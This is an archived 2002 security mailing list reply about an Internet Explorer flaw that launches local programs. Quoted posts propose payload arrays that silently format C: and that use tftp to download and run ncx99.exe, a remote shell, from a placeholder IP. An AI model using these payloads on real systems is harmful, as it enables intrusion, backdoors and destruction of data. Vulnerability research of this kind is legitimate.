Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Rather large MSIE-hole

From: methodic <methodic () slartibartfast angrypacket com>
Date: Thu, 14 Mar 2002 00:39:58 -0800
Im not sure who else has looked at this, but I dont believe its possible
to run programs with arguments using this vuln.

On 03.13.02, NoCoNFLiC <nocon () castleblack darkflame net> wrote:

[nyquist () ntlworld com] Wed, Mar 13, 2002 at 08:45:46AM +0000 wrote:

If this is confirmed, could this array by changed to equal, erm...let's
say format.exe (with a couple of parameters to silently format C:/)?

 var programName=new Array(
    'c:/windows/system32/logoff.exe',
    'c:/winxp/system32/logoff.exe',
    'c:/winnt/system32/logoff.exe'



   I havent tried, since i don't run MS, how about ? 

var programName=new Array(
     'c:/winnt/system32/tftp.exe -i xxx.xxx.xxx.xxx GET ncx99.exe',
     'c:/winnt/system32/ncx99.exe',
 );


- nocon

 


-- 
+ methodic >> [http://methodic.angrypacket.com] -- -
+ Cannot find nsabackdoor.dll. Please reinstall Windows.
Previous By Date Next
Previous By Thread Next

Current thread: